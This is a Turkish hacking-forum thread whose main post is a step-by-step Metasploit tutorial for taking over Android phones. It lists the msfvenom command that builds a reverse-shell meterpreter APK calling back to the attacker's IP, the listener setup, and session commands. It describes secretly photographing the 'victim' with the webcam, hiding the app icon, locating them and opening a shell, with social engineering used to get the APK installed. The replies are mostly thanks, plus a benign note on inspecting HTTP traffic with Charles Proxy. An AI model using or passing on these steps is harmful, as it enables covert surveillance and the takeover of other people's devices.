M-e-t-asploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

ratio

Kıdemli Üye
6 Tem 2013
2,456
6
Turk
Métasploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

İşlemin gerçekleşmesi için Met@sploit aracılığı ile oluşturacağımız androidapk’yı kurbanın telefonuna yüklenmesi ve açılması gerekmektedir.

Öncelikle Kali Linux makinemizde terminale giriyoruz. Aşağıdaki komutu girerek, önümüze gelen bilgilerden örn: “inet = 192.168.1.41” IP adresimizi öğreniyoruz.

Kod:
ifconfig



Daha sonra aşağıdaki komutda uygun yerleri düzelterek androidapk’mızı oluşturuyouz.

msfvenom –p android/meterpreter/reverse_tcp LHOST=IP_ADRESINIZ LPORT=4444 R > APKYI_OLUŞTURMAK/ISTEDIGINIZ/DIZIN

Örneğin ben masaüstünde yukarıda belirttiğimiz IP Adresinde, androidApk isimli bir apk oluşturmak için bu şekilde dolduruyorum.

Kod:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.41 LPORT=4444 R > /root/Desktop/androidApp.apk





Daha sonra aşağıdaki komutları ard arda yazarak apache servisimizi açıyoruz ve açılıp açılmadığını kontrol ediyoruz.

Kod:
service apache2 start



Kod:
service apache2 status



Daha sonra Met@sploit’i açıyoruz.

Kod:
msfconsole



Aşağıdaki komutu yazarak payload’ımızı seçiyoruz.

Kod:
set payload android/meterpreter/reverse_tcp

Daha sonra aşağıdaki komutu girerek seçeneklere bakıyoruz.

Kod:
show options

Aşağıdaki komutu girerek IP adresimizi ayarlıyoruz.

Kod:
set LHOST 192.168.1.41

Daha sonra da aşağıdaki komutu girerek sömürme işlemimizi başlatıyoruz.

Kod:
exploit




Met@sploit el sıkışmasını beklerken kurbana oluşturduğumuz apk’yı indiriyoruz, kuruyoruz daha sonra da açıyoruz.



Bağlantı alınca komut satırımız geliyor zaten.

Komut satırımıza aşağıdaki komutu yazıyoruz.

Kod:
background

Daha sonra aşağıdaki kodu yazarak oturumları listeliyoruz.

Kod:
sessions

Daha sonra da bağlanacağımız oturumun numarasına bakıyoruz ve aşağıdaki komutu giriyoruz.

sessions –i OTURUM_NUMARASI

Örn:

Kod:
sessions –i 2

Daha sonra bağlantıyı kurmuş bulunuyoruz şimdi aşağıdaki komutu yazarak neler yapabileceğimize bakıyoruz.

Kod:
help



Örnekler;

‘app_list’ yazarak yüklü olan uygulamaları listeleyebiliriz.



‘webcam_snap’ diyerek kurban farkına varmadan kamerasından görüntü alabiliriz.

[url=https://hizliresim.com/AOBL6r][img]https://i.hizliresim.com/AOBL6r.jpg[/img][/url]



‘hide_app_icon’ diyerek uygulamanın ikonunu gizleyebiliriz. Böylece menüde uygulamayı göremeyecektir. Sosyal mühendislik yaptıysanız uygulamanın yüklü olduğunun farkına bile varmayabilir. 😊

[url=https://hizliresim.com/zGd3l9][img]https://i.hizliresim.com/zGd3l9.png[/img][/url]



‘geolocate’ komutu ile kurbanın bulunduğu konumun koordinatlarını elde edebiliriz.

‘shell’ komutu ile terminal oluşturabiliriz ve terminali dilediğimiz gibi kullanabiliriz.



NOT: Root olmak için benim cihazımda kontrol eden uygulama vardı bu yüzden cihazımdan izin istediğimde ekrana bildirim gidiyordu. Ayrıca uygulamada root değilseniz bazı özellikleri kullanamayacaksınız. (Yukarıdakiler için izine ihtiyaç yoktur.)



Videolu Anlatım:

https://www.youtube.com/watch?v=YRm-St0bJhU
 
Son düzenleme:

P4RS

Özel Üye
8 Ocak 2017
5,156
59
Ankara
Cevap: Met@sploit ile Android Cihazları Hackleyin. //Siber Güvenlik Kulübü

Ellerine sağlık PigGunner :))
 

ratio

Kıdemli Üye
6 Tem 2013
2,456
6
Turk
Ellerine sağlık PigGunner :))


Teşekkürler, hocam. :)


Sansürleniyor diye m-e-t-a yapacağına méta yapabilirdin fyi


Ben yapmamıştım da bence de daha mantıklı ama düzeltemiyorum. :D


Termuxda nasıl yapabilirim


Bildiğim kadarıyla termuxda da ****sploit'in çalışıyor olması lazım. Kodları aynı şekilde kullanabiliyor olmalısınız.


Sadece http isteklerini görebileceğimiz bir program var mı ? veya apk ?
( zAnti hariç )


Ağdaki trafiği izlemek gibi bir şey kasıt ediyorsanız, wireshark ile http filtresine alarak bakabilirsiniz veya Charles isimli uygulamaya bir göz atabilirsiniz.

Bağlantı: https://www.charlesproxy.com/

Yapılandırma adımları:

Telefonunuzun ve PC'nizin veya MAC'inizin aynı LAN'da olmasına izin verin. (Aynı ağa bağlayın.)
Yüklediğiniz Charles'ı başlatın. (varsayılan proxy bağlantı noktası 8888'dir)
Telefonunuzun wifi yapılandırmasını ayarlayın: delege ipini PC'nize veya MAC'in ip'sine ayarlayın (set the ip of delegate to your PC or MAC's ip), delege portuna 8888 olarak ayarlayın.
Telefonunuzda uygulamanızı başlatın. Charles ile http isteklerini izleyin.


Ayrıca aşağıdaki bağlantıdan daha fazlası için göz atabilirsiniz.
Bağlantı: https://proandroiddev.com/various-m...affic-in-the-android-application-8685b9183418


İyi forumlar..
 
Son düzenleme:

CH

Moderatör
28 Ocak 2019
1,954
888
Siber
Eline sağlık. Bir insanın bütün konuları güzel olur mu ? oluyormuş :) Başarılarının devamını dilerim.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.